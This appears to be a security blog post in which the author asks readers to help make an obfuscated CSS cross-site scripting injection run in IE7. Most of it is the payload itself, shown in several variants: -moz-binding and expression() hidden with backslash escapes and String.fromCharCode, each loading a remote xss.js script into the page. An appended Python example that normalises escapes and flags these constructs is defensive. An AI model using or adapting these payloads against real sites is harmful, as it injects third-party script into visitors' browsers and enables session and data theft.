Filed under: security
OK, I had to do this…
After (2 long) days of testing and re-testing I was forced by circumstances to create this blog dedicated to understanding Ultimate XSS CSS injection, and because I didn’t want to make that awesome page a mess with my comments.
So this page is dedicated to those people who can and will help me solve this – especially
The facts:
We have this XSS injection, encoded with Hackvector, below:
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);xx: e\
xp\re\s\s\
i\o\n((win
dow.r!=1) 
? eval('x=
String.fro
mCharCode;
scr=docume
nt.createE
lement(x(1
15,99,114,
105,112,11
6));scr.se
tAttribute
(x(115,114
,99),x(104
,116,116,1
12,58,47,4
7,98,117,1
15,105,110
,101,115,1
15,105,110
,102,111,4
6,99,111,4
6,117,107,
47,108,97,
98,115,47,
120,115,11
5,47,120,1
15,115,46,
106,115));
document.g
etElementB
yId(x( 105
,110,106,1
01,99,116 
)).appendC
hild(scr);
window.r=1
;') : 1);" id="inject">test</div>
<html>
<body>
<link rel="stylesheet" type="text/css" href="test.css">
<div id="navigation">– Test –</div>
</body>
</html>
And a CSS file named test.css like the one below (keep the line breaks):
div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\
.xml\#xss);xx: e\xp\r
e\s\s\i\o\n((
window.r!=1) 
? eval('x=Str
ing.fromCharC
ode;scr=docum
ent.createEle
ment(x(115,99
,114,105,112,
116));scr.set
Attribute(x(1
15,114,99),x(
104,116,116,1
12,58,47,47,9
8,117,115,105
,110,101,115,
115,105,110,1
02,111,46,99,
111,46,117,10
7,47,108,97,9
8,115,47,120,
115,115,47,12
0,115,115,46,
106,115));doc
ument.getElem
entById(x( 10
5,110,106,101
,99,116 )).ap
pendChild(scr
);window.r=1;
') : 1);
}
Now we run a test: Firefox shows what it was supposed to show, “XBL XSS”, which means it works, BUT IE7 does nothing instead of running the JS at http://businessinfo.co.uk/labs/xss/xss.js, which is well hidden with <@tocharcodes> and <@hex_ent> in Hackvector.
You can test this by using FF or IE7 here.
Of course I’ve tried many, many different variations of this XSS injection and googled till my eyes blew out, but none of them worked – at least not for IE7. I have to admit I’ve learned something about CSS because I was at 0 here, but right now I’m just tired of learning and need an answer, so please make my day and give me the answer, and if you do, please make sure the last noob on earth will understand it.
Other variations of the test.css file are below:
div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;') : 1);
}
OR
div#navigation
{
xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;') : 1);
}
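The reason the payload above slips past a naive keyword filter is that nothing in it literally reads "expression(" or "-moz-binding": the CSS backslash escapes, the wrap line breaks inside identifiers, and the String.fromCharCode layer each hide one piece. Here is an added example, written for this post and not part of the original or of Hackvector, of the normalisation a defender would run before deciding whether a submitted style value is safe. It assumes the CSS 2.1 escape rules (backslash plus 1 to 6 hex digits is a code point, backslash plus newline is dropped, backslash plus any other character is that character); the sample it runs over is the style attribute from this post, rebuilt here with its wrap line breaks, and the charcode decoder is a triage aid that I wrote, not a general JavaScript parser.

```python
"""Added example: normalise CSS escapes and flag the script-carrying constructs
seen in this post. Not part of the original post or of Hackvector.

Assumed CSS 2.1 escape rules:
  \\ + 1-6 hex digits (+ one optional whitespace)  -> that code point
  \\ + newline                                     -> dropped (continuation)
  \\ + any other character                         -> that character
"""
import re

# Constructed sample: the style attribute from the post, with the line breaks
# the Hackvector output wrapped it at, so the normaliser must cope with them.
SAMPLE_STYLE = "\n".join([
    r"\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs",
    r"\/xbl\/xbl\.xml\#xss);xx: e" + "\\",        # line ends in a lone backslash
    r"xp\re\s\s" + "\\",
    r"i\o\n((win",
    r"dow.r!=1) ",
    r"? eval('x=",
    r"String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));",
    r"scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,98,117,115,105,110,",
    r"101,115,115,105,110,102,111,46,99,111,46,117,107,47,108,97,98,115,47,120,",
    r"115,115,47,120,115,115,46,106,115));",
    r"document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);",
    r"window.r=1;') : 1);",
])

_CSS_ESCAPE = re.compile(
    r"\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|(\r\n|[\n\r\f])|(.))", re.DOTALL)


def unescape_css(text: str) -> str:
    """Resolve CSS backslash escapes so obfuscated identifiers read normally."""
    def repl(m: re.Match) -> str:
        hexdigits, newline, other = m.groups()
        if hexdigits is not None:
            cp = int(hexdigits, 16)
            return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"
        if newline is not None:
            return ""            # backslash-newline is a line continuation
        return other             # "\m" -> "m", "\-" -> "-", "\/" -> "/"
    return _CSS_ESCAPE.sub(repl, text)


# Only the two constructs this post relies on; a production filter should
# allow-list properties and values instead of growing this deny-list.
DANGEROUS = ("-moz-binding", "expression(")


def flag_dangerous(css: str) -> list[str]:
    """Return the dangerous constructs present once escapes, comments and all
    whitespace (including wrap newlines inside identifiers) are removed."""
    flat = unescape_css(css)
    flat = re.sub(r"/\*.*?\*/", "", flat, flags=re.DOTALL)
    flat = re.sub(r"\s+", "", flat).lower()
    return [needle for needle in DANGEROUS if needle in flat]


_CHARCODE_CALL = re.compile(r"[A-Za-z_]\w*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)")


def decode_charcode_calls(js: str) -> str:
    """Replace calls whose arguments are all integers, e.g. x(115,99,114,105,112,116),
    with the string they spell, so the <@tocharcodes> layer becomes readable."""
    return _CHARCODE_CALL.sub(
        lambda m: '"' + "".join(chr(int(n)) for n in m.group(1).split(",")) + '"', js)


def decode_style(css: str) -> str:
    """Readable view of a style value: escapes resolved, wrap newlines removed,
    char-code calls decoded. Meant for triage, not for re-serialising CSS."""
    return decode_charcode_calls(re.sub(r"\r?\n", "", unescape_css(css)))


if __name__ == "__main__":
    print("flags:", flag_dangerous(SAMPLE_STYLE))
    print(decode_style(SAMPLE_STYLE))
```

Run stand-alone it reports both constructs and prints the de-obfuscated value, in which the three charcode blobs resolve to "script", "src" plus the xss.js URL, and "inject". The point of doing the escape and whitespace normalisation before matching is exactly what this post demonstrates from the other side: a filter that looks at the raw bytes of a style value sees neither keyword, while one that resolves escapes first sees both.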
I ask for 5 minutes of your time and I welcome your comments.
